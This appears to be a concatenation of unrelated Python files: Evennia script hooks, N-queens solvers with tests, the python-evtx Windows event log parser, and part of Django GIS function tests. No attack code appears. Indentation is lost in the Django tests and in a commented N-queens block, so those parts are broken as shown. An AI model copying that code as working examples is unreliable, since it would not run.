        if cdict.get("start_delay") and self.start_delay != cdict["start_delay"]:
            self.db_start_delay = cdict["start_delay"]
            updates.append("db_start_delay")
        if cdict.get("repeats") and self.repeats != cdict["repeats"]:
            self.db_repeats = cdict["repeats"]
            updates.append("db_repeats")
        if cdict.get("persistent") and self.persistent != cdict["persistent"]:
            self.db_persistent = cdict["persistent"]
            updates.append("db_persistent")
        if updates:
            # save all changed fields in one query
            self.save(update_fields=updates)
        if not cdict.get("autostart"):
            # don't auto-start the script
            return
    # auto-start script (default)
    self.start()
def at_script_creation(self):
    """
    Only called once, by the create function. Overload to set up
    the script's default key, desc, interval etc.
    """
    pass
def is_valid(self):
    """
    Is called to check if the script is valid to run at this time.
    Should return a boolean. The method is assumed to collect all
    needed information from its related self.obj.

    Returns:
        bool: False once this script has been flagged as deleted.
    """
    return not self._is_deleted
def at_start(self, **kwargs):
    """
    Called whenever the script is started, which for persistent
    scripts is at least once every server start. It will also be
    called when starting again after a pause (such as after a
    server reload)

    Args:
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).
    """
    pass
def at_repeat(self, **kwargs):
    """
    Called repeatedly if this Script is set to repeat regularly.

    Args:
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).
    """
    pass
def at_stop(self, **kwargs):
    """
    Called whenever when it's time for this script to stop (either
    because is_valid returned False or it runs out of iterations)

    Args:
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).
    """
    pass
def at_server_reload(self):
    """
    This hook is called whenever the server is shutting down for
    restart/reboot. If you want to, for example, save
    non-persistent properties across a restart, this is the place
    to do it.
    """
    pass
def at_server_shutdown(self):
    """
    This hook is called whenever the server is shutting down fully
    (i.e. not for a restart).
    """
    pass
# Some useful default Script types used by Evennia.
class DoNothing(DefaultScript):
    """
    A script that does nothing. Used as default fallback.
    """
    def at_script_creation(self):
        """
        Setup the script: only an identifying key and description.
        """
        self.key = "sys_do_nothing"
        self.desc = "This is an empty placeholder script."
class Store(DefaultScript):
    """
    Simple storage script, used only as a container for attributes.
    """
    def at_script_creation(self):
        """
        Setup the script: only an identifying key and description.
        """
        self.key = "sys_storage"
        self.desc = "This is a generic storage container."
| |
'''
1. brute force: check every single combo of placements, 64C8 (4 bil)
2. brute force: constrain each queen to a column, 8^8 (16 mil)
3. permutations: constrain each queen to a column and row, 8! (40 k)
4. backtracking, from brute force: (15 k)
5. backtracking, with permutations (5 k)
# TODO
# 2. backtracking all n^2Cn
# 3. combo of permutation plus backtracking
# from leetcode
# https://leetcode.com/problems/n-queens-ii/discuss/20147/Python-recursive-dfs-solution.
def v1(n):
return dfs1([0]*n, 0, 0)
def dfs1(nums, index, total):
#print(nums, index, total)
if index == len(nums):
return total + 1
count = 0
for i in range(len(nums)):
nums[index] = i
if valid(nums, index):
count += dfs1(nums, index+1, total)
return total + count
def valid(nums, n):
#print(nums, n)
for i in range(n):
if nums[i] == nums[n] or abs(nums[n]-nums[i]) == n-i:
return False
return True
# https://leetcode.com/problems/n-queens-ii/discuss/20090/11-line-Python-solution-easy-to-understand
def v2(n):
sets = set(range(n))
return dfs(sets, ['.'] * n, 0, n)
def dfs(sets, board, row, n):
if row == n:
return 1
count = 0
for x in sets - set(board):
# check diagonal conflict
if all(row - i != abs(x - y) for i, y in enumerate(board[:row])):
board[row] = x
count += dfs(sets, board, row + 1, n)
board[row] = '.'
return count
# https://leetcode.com/problems/n-queens-ii/discuss/20169/Accepted-backtracking-Python-solution.-Very-similar-to-the-solution-to-N-Queens-I.
def v3(self, n):
self.num = 0
self.board = [["." for x in range(n)] for x in range(n)]
self.n = n
self.solve(0)
return self.num
def solve(self, col):
if col == self.n:
self.num += 1
return
for row in range(self.n):
if self.isSafe(row, col):
self.board[row][col] = "Q"
self.solve(col+1)
self.board[row][col] = "."
def isSafe(self, row, col):
for c in range(col):
if self.board[row][c] == "Q":
return False
rup = row-1
rdown = row+1
c = col-1
while c >= 0:
if rup >= 0:
if self.board[rup][c] == "Q":
return False
if rdown < self.n:
if self.board[rdown][c] == "Q":
return False
rup -= 1
rdown += 1
c -= 1
return True
'''
# Generate n! perms and check which ones are valid
def v4(n):
    """Count n-queens solutions by filtering all n! permutations."""
    # each permutation fixes one queen per column/row; only diagonals
    # still need checking, which isBoardValid does
    return sum(1 for perm in generatePermutations(n) if isBoardValid(perm))
def generatePermutations(n):
    """Return every permutation of range(n) as a list of lists.

    Built incrementally: each value is inserted at every possible
    position of every partial permutation built so far.
    """
    perms = [[]]
    for value in range(n):
        perms = [
            partial[:slot] + [value] + partial[slot:]
            for partial in perms
            for slot in range(len(partial) + 1)
        ]
    return perms
def v5(n):
    """Count n-queens solutions via backtracking over row choices."""
    solutions = []
    helper5(solutions, set(range(n)), [])
    return len(solutions)
def helper5(results, remaining, path):
    """Backtracking step: extend `path` (rows chosen so far, one per
    column) with every still-unused, diagonal-safe row in `remaining`,
    appending complete placements to `results`."""
    if not remaining:
        results.append(path)
        return
    for row in remaining:
        if not isNewQueenValid(path, row):
            continue
        # recurse on fresh copies so sibling branches stay independent
        helper5(results, remaining - {row}, path + [row])
def isNewQueenValid(colRows, newRow):
    """Return True if a queen at (column=len(colRows), row=newRow)
    attacks no earlier queen along a diagonal.

    Rows and columns need no checking: one queen per column is
    implicit, and distinct rows are the caller's invariant.
    """
    newCol = len(colRows)
    return all(
        prevCol + prevRow != newCol + newRow
        and prevCol - prevRow != newCol - newRow
        for prevCol, prevRow in enumerate(colRows)
    )
def isBoardValid(cols):
    """Return True if no pair of queens in `cols` (row index per
    column) shares a diagonal.

    Columns and rows are already unique by construction, so only
    the two diagonal directions are checked.
    """
    for currCol in range(1, len(cols)):
        currRow = cols[currCol]
        for prevCol, prevRow in enumerate(cols[:currCol]):
            # "/" diagonal: col+row constant; "\" diagonal: col-row constant
            if currCol + currRow == prevCol + prevRow:
                return False
            if currCol - currRow == prevCol - prevRow:
                return False
    return True
def isEndValid(cols):
    """Return True if the most recently placed queen (last column of
    `cols`) shares no diagonal with any earlier queen.

    Assumes earlier columns were already validated; `cols` must be
    non-empty.
    """
    currCol = len(cols) - 1
    currRow = cols[currCol]
    return all(
        prevCol + prevRow != currCol + currRow
        and prevCol - prevRow != currCol - currRow
        for prevCol, prevRow in enumerate(cols[:currCol])
    )
import testSuite
def main():
    """Entry point: run whichever manual test batches are enabled."""
    #testIsValid()
    #testIsValidNewQueen()
    #testPermutation()
    testMain()
def testMain():
    """Run the solver versions against known n-queens solution counts.

    Each entry is [[n], expected_count]; the larger n are commented
    out to keep the run fast.
    """
    tests = [
        #[[1], 1],
        #[[2], 0],
        #[[3], 0],
        [[4], 2],
        [[5], 10],
        [[6], 4],
        [[7], 40],
        [[8], 92],
        #[[9], 352],
        #[[10], 724],
    ]
    t = testSuite.init(tests)
    #t.test(v1)
    #t.test(v2)
    t.test(v4)
    t.test(v5)
def testIsValid():
    """Exercise the whole-board validators on full and partial boards."""
    tests = [
        [[[3,2,1,0]], False],
        [[[3,2,0,1]], False],
        [[[1,2,3,0]], False],
        [[[0,1,2,3]], False],
        # valid (very few)
        [[[1,3,0,2]], True],
        [[[2,0,3,1]], True],
        # partial
        [[[3,2]], False],
        [[[2,0]], True],
    ]
    t = testSuite.init(tests)
    t.test(isEndValid)
    t.test(isBoardValid)
def testIsValidNewQueen():
    """Exercise the incremental validator: [existing rows], new row."""
    tests = [
        [[[3,2,1],0], False],
        [[[3,2,0],1], False],
        [[[1,2,3],0], False],
        [[[0,1,2],3], False],
        # valid (very few)
        [[[1,3,0],2], True],
        [[[2,0,3],1], True],
        # partial
        [[[3],2], False],
        [[[2],0], True],
    ]
    t = testSuite.init(tests)
    t.test(isNewQueenValid)
def testPermutation():
    """Smoke-test permutation generation by printing all perms of n=4."""
    #p = generatePermutations(3)
    # Fixed: referenced nonexistent `generatePermutations2`, which
    # raised NameError whenever this test was enabled.
    p = generatePermutations(4)
    print(p)
main()
| |
#!/usr/bin/python
# This file is part of python-evtx.
#
# Copyright 2012, 2013 Willi Ballenthin <william.ballenthin@mandiant.com>
# while at Mandiant <http://www.mandiant.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Version v.0.3.0
import re
import binascii
import mmap
from functools import wraps
from BinaryParser import ParseException
from BinaryParser import Block
from BinaryParser import debug
from BinaryParser import warning
from Nodes import NameStringNode
from Nodes import TemplateNode
from Nodes import RootNode
class InvalidRecordException(ParseException):
    """Raised when a Record's on-disk structure fails sanity checks
    (e.g. an implausible size field)."""
    def __init__(self):
        super(InvalidRecordException, self).__init__(
            "Invalid record structure")
class Evtx(object):
    """
    A convenience class that makes it easy to open an
    EVTX file and start iterating the important structures.
    Note, this class must be used in a context statement
    (see the `with` keyword).
    Note, this class will mmap the target file, so ensure
    your platform supports this operation.
    """
    def __init__(self, filename):
        """
        @type filename: str
        @param filename: A string that contains the path
          to the EVTX file to open.
        """
        self._filename = filename
        self._buf = None  # mmap of the file; set on __enter__
        self._f = None    # underlying file object
        self._fh = None   # parsed FileHeader
    def __enter__(self):
        # read-only mmap of the whole file; length 0 means "entire file"
        self._f = open(self._filename, "rb")
        self._buf = mmap.mmap(self._f.fileno(), 0, access=mmap.ACCESS_READ)
        self._fh = FileHeader(self._buf, 0x0)
        return self
    def __exit__(self, type, value, traceback):
        # release the mmap before the file; exceptions propagate
        self._buf.close()
        self._f.close()
        self._fh = None
    def ensure_contexted(func):
        """
        This decorator ensures that an instance of the
        Evtx class is used within a context statement. That is,
        that the `with` statement is used, or `__enter__()`
        and `__exit__()` are called explicitly.
        """
        @wraps(func)
        def wrapped(self, *args, **kwargs):
            if self._buf is None:
                raise TypeError("An Evtx object must be used with"
                                " a context (see the `with` statement).")
            else:
                return func(self, *args, **kwargs)
        return wrapped
    @ensure_contexted
    def chunks(self):
        """
        Get each of the ChunkHeaders from within this EVTX file.

        @rtype generator of ChunkHeader
        @return A generator of ChunkHeaders from this EVTX file.
        """
        for chunk in self._fh.chunks():
            yield chunk
    @ensure_contexted
    def records(self):
        """
        Get each of the Records from within this EVTX file.

        @rtype generator of Record
        @return A generator of Records from this EVTX file.
        """
        for chunk in self.chunks():
            for record in chunk.records():
                yield record
    @ensure_contexted
    def get_record(self, record_num):
        """
        Get a Record by record number.

        @type record_num: int
        @param record_num: The record number of the record to fetch.
        @rtype Record or None
        @return The record requested by record number, or None if
          the record is not found.
        """
        return self._fh.get_record(record_num)
    @ensure_contexted
    def get_file_header(self):
        """@return The parsed FileHeader of this EVTX file."""
        return self._fh
class FileHeader(Block):
    """
    Parses the fixed-layout EVTX file header and exposes the chunks
    that follow it.

    NOTE(review): written for Python 2 — magic comparisons use str
    literals, not bytes.
    """
    def __init__(self, buf, offset):
        """
        @param buf: Buffer (e.g. mmap) containing the EVTX file.
        @param offset: Offset of the file header within `buf`.
        """
        debug("FILE HEADER at %s." % (hex(offset)))
        super(FileHeader, self).__init__(buf, offset)
        # field order mirrors the on-disk layout; offsets after the
        # first are implicit (sequential)
        self.declare_field("string", "magic", 0x0, length=8)
        self.declare_field("qword", "oldest_chunk")
        self.declare_field("qword", "current_chunk_number")
        self.declare_field("qword", "next_record_number")
        self.declare_field("dword", "header_size")
        self.declare_field("word", "minor_version")
        self.declare_field("word", "major_version")
        self.declare_field("word", "header_chunk_size")
        self.declare_field("word", "chunk_count")
        self.declare_field("binary", "unused1", length=0x4c)
        self.declare_field("dword", "flags")
        self.declare_field("dword", "checksum")
    def __repr__(self):
        return "FileHeader(buf=%r, offset=%r)" % (self._buf, self._offset)
    def __str__(self):
        return "FileHeader(offset=%s)" % (hex(self._offset))
    def check_magic(self):
        """
        @return A boolean that indicates if the first eight bytes of
          the FileHeader match the expected magic value.
        """
        return self.magic() == "ElfFile\x00"
    def calculate_checksum(self):
        """
        @return A integer in the range of an unsigned int that
          is the calculated CRC32 checksum off the first 0x78 bytes.
          This is consistent with the checksum stored by the FileHeader.
        """
        # mask to keep the result unsigned across platforms
        return binascii.crc32(self.unpack_binary(0, 0x78)) & 0xFFFFFFFF
    def verify(self):
        """
        @return A boolean that indicates that the FileHeader
          successfully passes a set of heuristic checks that
          all EVTX FileHeaders should pass.
        """
        return self.check_magic() and \
            self.major_version() == 0x3 and \
            self.minor_version() == 0x1 and \
            self.header_chunk_size() == 0x1000 and \
            self.checksum() == self.calculate_checksum()
    def is_dirty(self):
        """
        @return A boolean that indicates that the log has been
          opened and was changed, though not all changes might be
          reflected in the file header.
        """
        return self.flags() & 0x1 == 0x1
    def is_full(self):
        """
        @return A boolean that indicates that the log
          has reached its maximum configured size and the retention
          policy in effect does not allow to reclaim a suitable amount
          of space from the oldest records and an event message could
          not be written to the log file.
        """
        return self.flags() & 0x2 == 0x2
    def first_chunk(self):
        """
        @return A ChunkHeader instance that is the first chunk
          in the log file, which is always found directly after
          the FileHeader.
        """
        ofs = self._offset + self.header_chunk_size()
        return ChunkHeader(self._buf, ofs)
    def current_chunk(self):
        """
        @return A ChunkHeader instance that is the current chunk
          indicated by the FileHeader.
        """
        ofs = self._offset + self.header_chunk_size()
        # each chunk occupies a fixed 0x10000 bytes
        ofs += (self.current_chunk_number() * 0x10000)
        return ChunkHeader(self._buf, ofs)
    def chunks(self):
        """
        @return A generator that yields the chunks of the log file
          starting with the first chunk, which is always found directly
          after the FileHeader, and continuing to the end of the file.
        """
        ofs = self._offset + self.header_chunk_size()
        # walk in fixed 0x10000-byte strides until the buffer ends
        while ofs + 0x10000 <= len(self._buf):
            yield ChunkHeader(self._buf, ofs)
            ofs += 0x10000
    def get_record(self, record_num):
        """
        Get a Record by record number.

        @type record_num: int
        @param record_num: The record number of the record to fetch.
        @rtype Record or None
        @return The record requested by record number, or None if the
          record is not found.
        """
        for chunk in self.chunks():
            # skip chunks whose record-number range cannot contain it
            first_record = chunk.log_first_record_number()
            last_record = chunk.log_last_record_number()
            if not (first_record <= record_num <= last_record):
                continue
            for record in chunk.records():
                if record.record_num() == record_num:
                    return record
        return None
class Template(object):
    """
    Wraps a TemplateNode and renders its markup to XML text with
    substitution values applied.
    """
    def __init__(self, template_node):
        """
        @param template_node: The TemplateNode to wrap.
        """
        self._template_node = template_node
        self._xml = None  # lazily-built str.format() template cache
    def _load_xml(self):
        """
        Build and cache a str.format() template from the node's markup.

        TODO(wb): One day, nodes should generate format strings
        instead of the XML format made-up abomination.
        """
        if self._xml is not None:
            return
        # Fixed: the pattern is now a raw string. The previous non-raw
        # literal only worked because Python passes unknown escapes
        # like "\[" and "\d" through verbatim — deprecated behavior
        # that raises warnings (and eventually errors) on modern
        # interpreters.
        matcher = r"\[(?:Normal|Conditional) Substitution\(index=(\d+), type=\d+\)\]"
        # Escape literal braces first, then turn each substitution
        # marker into a positional format field like "{3:}".
        self._xml = re.sub(matcher, "{\\1:}",
                           self._template_node.template_format().replace("{", "{{").replace("}", "}}"))
    def make_substitutions(self, substitutions):
        """
        Render the template with the given substitution values.

        @type substitutions: list of VariantTypeNode
        @return The rendered XML string.
        """
        self._load_xml()
        return self._xml.format(*map(lambda n: n.xml(), substitutions))
    def node(self):
        """@return The wrapped TemplateNode."""
        return self._template_node
class ChunkHeader(Block):
    """
    Parses one 0x10000-byte EVTX chunk: its header, the shared
    string/template tables, and the records it contains.

    NOTE(review): Python 2 code (`xrange`, str magic comparison).
    """
    def __init__(self, buf, offset):
        """
        @param buf: Buffer containing the EVTX file.
        @param offset: Offset of this chunk within `buf`.
        """
        debug("CHUNK HEADER at %s." % (hex(offset)))
        super(ChunkHeader, self).__init__(buf, offset)
        self._strings = None    # lazy dict: chunk-relative offset -> NameStringNode
        self._templates = None  # lazy dict: chunk-relative offset -> TemplateNode
        self.declare_field("string", "magic", 0x0, length=8)
        self.declare_field("qword", "file_first_record_number")
        self.declare_field("qword", "file_last_record_number")
        self.declare_field("qword", "log_first_record_number")
        self.declare_field("qword", "log_last_record_number")
        self.declare_field("dword", "header_size")
        self.declare_field("dword", "last_record_offset")
        self.declare_field("dword", "next_record_offset")
        self.declare_field("dword", "data_checksum")
        self.declare_field("binary", "unused", length=0x44)
        self.declare_field("dword", "header_checksum")
    def __repr__(self):
        return "ChunkHeader(buf=%r, offset=%r)" % (self._buf, self._offset)
    def __str__(self):
        return "ChunkHeader(offset=%s)" % (hex(self._offset))
    def check_magic(self):
        """
        @return A boolean that indicates if the first eight bytes of
          the ChunkHeader match the expected magic value.
        """
        return self.magic() == "ElfChnk\x00"
    def calculate_header_checksum(self):
        """
        @return A integer in the range of an unsigned int that
          is the calculated CRC32 checksum of the ChunkHeader fields.
        """
        # the checksum covers the header minus the checksum field
        # region (0x78-0x80 skipped), plus the string/template tables
        data = self.unpack_binary(0x0, 0x78)
        data += self.unpack_binary(0x80, 0x180)
        return binascii.crc32(data) & 0xFFFFFFFF
    def calculate_data_checksum(self):
        """
        @return A integer in the range of an unsigned int that
          is the calculated CRC32 checksum of the Chunk data.
        """
        # record data starts at 0x200 and ends at next_record_offset
        data = self.unpack_binary(0x200, self.next_record_offset() - 0x200)
        return binascii.crc32(data) & 0xFFFFFFFF
    def verify(self):
        """
        @return A boolean that indicates that the ChunkHeader
          successfully passes a set of heuristic checks that
          all EVTX ChunkHeaders should pass.
        """
        return self.check_magic() and \
            self.calculate_header_checksum() == self.header_checksum() and \
            self.calculate_data_checksum() == self.data_checksum()
    def _load_strings(self):
        # populate the string cache by walking each of the 64 hash
        # buckets; each bucket is a chain linked via next_offset()
        if self._strings is None:
            self._strings = {}
        for i in xrange(64):
            ofs = self.unpack_dword(0x80 + (i * 4))
            while ofs > 0:
                string_node = self.add_string(ofs)
                ofs = string_node.next_offset()
    def strings(self):
        """
        @return A dict(offset --> NameStringNode)
        """
        if not self._strings:
            self._load_strings()
        return self._strings
    def add_string(self, offset, parent=None):
        """
        @param offset An integer offset that is relative to the start of
          this chunk.
        @param parent (Optional) The parent of the newly created
          NameStringNode instance. (Default: this chunk).
        @return The newly added NameStringNode instance.
        """
        if self._strings is None:
            self._load_strings()
        string_node = NameStringNode(self._buf, self._offset + offset,
                                     self, parent or self)
        self._strings[offset] = string_node
        return string_node
    def _load_templates(self):
        """
        Populate the template cache by walking each of the 32 hash
        buckets of the template table.

        @return None
        """
        if self._templates is None:
            self._templates = {}
        for i in xrange(32):
            ofs = self.unpack_dword(0x180 + (i * 4))
            while ofs > 0:
                # unclear why these are found before the offset
                # this is a direct port from A.S.'s code
                token = self.unpack_byte(ofs - 10)
                pointer = self.unpack_dword(ofs - 4)
                if token != 0x0c or pointer != ofs:
                    warning("Unexpected token encountered")
                    ofs = 0
                    continue
                template = self.add_template(ofs)
                ofs = template.next_offset()
    def add_template(self, offset, parent=None):
        """
        @param offset An integer which contains the chunk-relative offset
          to a template to load into this Chunk.
        @param parent (Optional) The parent of the newly created
          TemplateNode instance. (Default: this chunk).
        @return Newly added TemplateNode instance.
        """
        if self._templates is None:
            self._load_templates()
        node = TemplateNode(self._buf, self._offset + offset,
                            self, parent or self)
        self._templates[offset] = node
        return node
    def templates(self):
        """
        @return A dict(offset --> Template) of all encountered
          templates in this Chunk.
        """
        if not self._templates:
            self._load_templates()
        return self._templates
    def first_record(self):
        """@return The first Record in this chunk (data starts at 0x200)."""
        return Record(self._buf, self._offset + 0x200, self)
    def records(self):
        """
        @return A generator of the Records in this chunk, stopping at
          next_record_offset or on a malformed record.
        """
        record = self.first_record()
        while record._offset < self._offset + self.next_record_offset():
            yield record
            try:
                record = Record(self._buf,
                                record._offset + record.length(),
                                self)
            except InvalidRecordException:
                return
class Record(Block):
    """
    Parses a single EVTX event record within a chunk.
    """
    def __init__(self, buf, offset, chunk):
        """
        @param buf: Buffer containing the EVTX file.
        @param offset: Offset of this record within `buf`.
        @param chunk: The ChunkHeader that contains this record.

        @raises InvalidRecordException: if the size field exceeds the
          maximum possible chunk size (0x10000).
        """
        debug("Record at %s." % (hex(offset)))
        super(Record, self).__init__(buf, offset)
        self._chunk = chunk
        self.declare_field("dword", "magic", 0x0)  # 0x00002a2a
        self.declare_field("dword", "size")
        self.declare_field("qword", "record_num")
        self.declare_field("filetime", "timestamp")
        if self.size() > 0x10000:
            # a record cannot be larger than its containing chunk
            raise InvalidRecordException()
        # trailing copy of the size field, used by verify()
        self.declare_field("dword", "size2", self.size() - 4)
    def __repr__(self):
        return "Record(buf=%r, offset=%r)" % (self._buf, self._offset)
    def __str__(self):
        return "Record(offset=%s)" % (hex(self._offset))
    def root(self):
        """@return The RootNode of this record's BXML payload (at +0x18)."""
        return RootNode(self._buf, self._offset + 0x18, self._chunk, self)
    def length(self):
        """@return The total length of this record in bytes."""
        return self.size()
    def verify(self):
        """@return True if the leading and trailing size fields agree."""
        return self.size() == self.size2()
    def data(self):
        """
        Return the raw data block which makes up this record as a bytestring.

        @rtype str
        @return A string that is a copy of the buffer that makes
          up this record.
        """
        return self._buf[self.offset():self.offset() + self.size()]
| |
from __future__ import unicode_literals
import re
from decimal import Decimal
from django.contrib.gis.db.models import functions
from django.contrib.gis.geos import LineString, Point, Polygon, fromstr
from django.db import connection
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from ..utils import mysql, oracle, postgis, spatialite
from .models import City, Country, State, Track
@skipUnlessDBFeature("gis_enabled")
class GISFunctionsTests(TestCase):
"""
Testing functions from django/contrib/gis/db/models/functions.py.
Several tests are taken and adapted from GeoQuerySetTest.
Area/Distance/Length/Perimeter are tested in distapp/tests.
Please keep the tests in function's alphabetic order.
"""
fixtures = ['initial']
def test_asgeojson(self):
    """AsGeoJSON output, including `crs`, `bbox` and `precision` args."""
    # Only PostGIS and SpatiaLite support GeoJSON.
    if not connection.ops.geojson:
        with self.assertRaises(NotImplementedError):
            list(Country.objects.annotate(json=functions.AsGeoJSON('mpoly')))
        return
    pueblo_json = '{"type":"Point","coordinates":[-104.609252,38.255001]}'
    houston_json = (
        '{"type":"Point","crs":{"type":"name","properties":'
        '{"name":"EPSG:4326"}},"coordinates":[-95.363151,29.763374]}'
    )
    victoria_json = (
        '{"type":"Point","bbox":[-123.30519600,48.46261100,-123.30519600,48.46261100],'
        '"coordinates":[-123.305196,48.462611]}'
    )
    chicago_json = (
        '{"type":"Point","crs":{"type":"name","properties":{"name":"EPSG:4326"}},'
        '"bbox":[-87.65018,41.85039,-87.65018,41.85039],"coordinates":[-87.65018,41.85039]}'
    )
    if spatialite:
        # SpatiaLite trims trailing zeros in the bbox values.
        victoria_json = (
            '{"type":"Point","bbox":[-123.305196,48.462611,-123.305196,48.462611],'
            '"coordinates":[-123.305196,48.462611]}'
        )
    # Precision argument should only be an integer
    with self.assertRaises(TypeError):
        City.objects.annotate(geojson=functions.AsGeoJSON('point', precision='foo'))
    # Reference queries and values.
    # SELECT ST_AsGeoJson("geoapp_city"."point", 8, 0)
    # FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Pueblo';
    self.assertEqual(
        pueblo_json,
        City.objects.annotate(geojson=functions.AsGeoJSON('point')).get(name='Pueblo').geojson
    )
    # SELECT ST_AsGeoJson("geoapp_city"."point", 8, 2) FROM "geoapp_city"
    # WHERE "geoapp_city"."name" = 'Houston';
    # This time we want to include the CRS by using the `crs` keyword.
    self.assertEqual(
        houston_json,
        City.objects.annotate(json=functions.AsGeoJSON('point', crs=True)).get(name='Houston').json
    )
    # SELECT ST_AsGeoJson("geoapp_city"."point", 8, 1) FROM "geoapp_city"
    # WHERE "geoapp_city"."name" = 'Houston';
    # This time we include the bounding box by using the `bbox` keyword.
    self.assertEqual(
        victoria_json,
        City.objects.annotate(
            geojson=functions.AsGeoJSON('point', bbox=True)
        ).get(name='Victoria').geojson
    )
    # SELECT ST_AsGeoJson("geoapp_city"."point", 5, 3) FROM "geoapp_city"
    # WHERE "geoapp_city"."name" = 'Chicago';
    # Finally, we set every available keyword.
    self.assertEqual(
        chicago_json,
        City.objects.annotate(
            geojson=functions.AsGeoJSON('point', bbox=True, crs=True, precision=5)
        ).get(name='Chicago').geojson
    )
@skipUnlessDBFeature("has_AsGML_function")
def test_asgml(self):
    """AsGML output: default (GML 2) and `version=3` rendering."""
    # Should throw a TypeError when trying to obtain GML from a
    # non-geometry field.
    qs = City.objects.all()
    with self.assertRaises(TypeError):
        qs.annotate(gml=functions.AsGML('name'))
    ptown = City.objects.annotate(gml=functions.AsGML('point', precision=9)).get(name='Pueblo')
    if oracle:
        # No precision parameter for Oracle :-/
        gml_regex = re.compile(
            r'^<gml:Point srsName="SDO:4326" xmlns:gml="http://www.opengis.net/gml">'
            r'<gml:coordinates decimal="\." cs="," ts=" ">-104.60925\d+,38.25500\d+ '
            r'</gml:coordinates></gml:Point>'
        )
    else:
        gml_regex = re.compile(
            r'^<gml:Point srsName="EPSG:4326"><gml:coordinates>'
            r'-104\.60925\d+,38\.255001</gml:coordinates></gml:Point>'
        )
    self.assertTrue(gml_regex.match(ptown.gml))
    if postgis:
        # GML 3 uses <gml:pos> instead of <gml:coordinates>.
        self.assertIn(
            '<gml:pos srsDimension="2">',
            City.objects.annotate(gml=functions.AsGML('point', version=3)).get(name='Pueblo').gml
        )
@skipUnlessDBFeature("has_AsKML_function")
def test_askml(self):
    """AsKML output and its type checking of non-geometry fields."""
    # Should throw a TypeError when trying to obtain KML from a
    # non-geometry field.
    with self.assertRaises(TypeError):
        City.objects.annotate(kml=functions.AsKML('name'))
    # Ensuring the KML is as expected.
    ptown = City.objects.annotate(kml=functions.AsKML('point', precision=9)).get(name='Pueblo')
    self.assertEqual('<Point><coordinates>-104.609252,38.255001</coordinates></Point>', ptown.kml)
@skipUnlessDBFeature("has_AsSVG_function")
def test_assvg(self):
    """AsSVG output in absolute and relative coordinate modes."""
    with self.assertRaises(TypeError):
        City.objects.annotate(svg=functions.AsSVG('point', precision='foo'))
    # SELECT AsSVG(geoapp_city.point, 0, 8) FROM geoapp_city WHERE name = 'Pueblo';
    svg1 = 'cx="-104.609252" cy="-38.255001"'
    # Even though relative, only one point so it's practically the same except for
    # the 'c' letter prefix on the x,y values.
    svg2 = svg1.replace('c', '')
    self.assertEqual(svg1, City.objects.annotate(svg=functions.AsSVG('point')).get(name='Pueblo').svg)
    self.assertEqual(svg2, City.objects.annotate(svg=functions.AsSVG('point', relative=5)).get(name='Pueblo').svg)
@skipUnlessDBFeature("has_BoundingCircle_function")
def test_bounding_circle(self):
    """BoundingCircle areas, default and with custom `num_seg`."""
    qs = Country.objects.annotate(circle=functions.BoundingCircle('mpoly')).order_by('name')
    self.assertAlmostEqual(qs[0].circle.area, 168.89, 2)
    self.assertAlmostEqual(qs[1].circle.area, 135.95, 2)
    # fewer segments approximate the circle with a smaller polygon
    qs = Country.objects.annotate(circle=functions.BoundingCircle('mpoly', num_seg=12)).order_by('name')
    self.assertAlmostEqual(qs[0].circle.area, 168.44, 2)
    self.assertAlmostEqual(qs[1].circle.area, 135.59, 2)
@skipUnlessDBFeature("has_Centroid_function")
def test_centroid(self):
    """Centroid matches GEOS' centroid within a backend tolerance."""
    qs = State.objects.exclude(poly__isnull=True).annotate(centroid=functions.Centroid('poly'))
    # backend-specific tolerance for the coordinate comparison
    tol = 1.8 if mysql else (0.1 if oracle else 0.00001)
    for state in qs:
        self.assertTrue(state.poly.centroid.equals_exact(state.centroid, tol))
    with self.assertRaisesMessage(TypeError, "'Centroid' takes exactly 1 argument (2 given)"):
        State.objects.annotate(centroid=functions.Centroid('poly', 'poly'))
@skipUnlessDBFeature("has_Difference_function")
def test_difference(self):
    """Difference against a point matches GEOS' difference."""
    geom = Point(5, 23, srid=4326)
    qs = Country.objects.annotate(diff=functions.Difference('mpoly', geom))
    # For some reason SpatiaLite does something screwy with the Texas geometry here.
    if spatialite:
        qs = qs.exclude(name='Texas')
    for c in qs:
        self.assertTrue(c.mpoly.difference(geom).equals(c.diff))
@skipUnlessDBFeature("has_Difference_function", "has_Transform_function")
def test_difference_mixed_srid(self):
"""Testing with mixed SRID (Country has default 4326)."""
# The parameter geometry uses spherical-mercator coordinates; the backend
# must transform it before computing the difference.
geom = Point(556597.4, 2632018.6, srid=3857)  # Spherical mercator
qs = Country.objects.annotate(difference=functions.Difference('mpoly', geom))
# For some reason SpatiaLite does something screwy with the Texas geometry here.
if spatialite:
qs = qs.exclude(name='Texas')
for c in qs:
self.assertTrue(c.mpoly.difference(geom).equals(c.difference))
@skipUnlessDBFeature("has_Envelope_function")
def test_envelope(self):
    """Envelope() of a multipolygon comes back as a Polygon instance."""
    annotated = Country.objects.annotate(envelope=functions.Envelope('mpoly'))
    for c in annotated:
        self.assertIsInstance(c.envelope, Polygon)
# ForceRHR() must rewrite the ring vertex order so exterior rings wind
# clockwise and interior rings counter-clockwise (the right-hand rule).
@skipUnlessDBFeature("has_ForceRHR_function")
def test_force_rhr(self):
rings = (
((0, 0), (5, 0), (0, 5), (0, 0)),
((1, 1), (1, 3), (3, 1), (1, 1)),
)
# Same rings with the orientation flipped per the right-hand rule.
rhr_rings = (
((0, 0), (0, 5), (5, 0), (0, 0)),
((1, 1), (3, 1), (1, 3), (1, 1)),
)
State.objects.create(name='Foo', poly=Polygon(*rings))
st = State.objects.annotate(force_rhr=functions.ForceRHR('poly')).get(name='Foo')
self.assertEqual(rhr_rings, st.force_rhr.coords)
# GeoHash() of a point matches the reference hash; a `precision` argument
# truncates the hash to that many characters.
@skipUnlessDBFeature("has_GeoHash_function")
def test_geohash(self):
# Reference query:
# SELECT ST_GeoHash(point) FROM geoapp_city WHERE name='Houston';
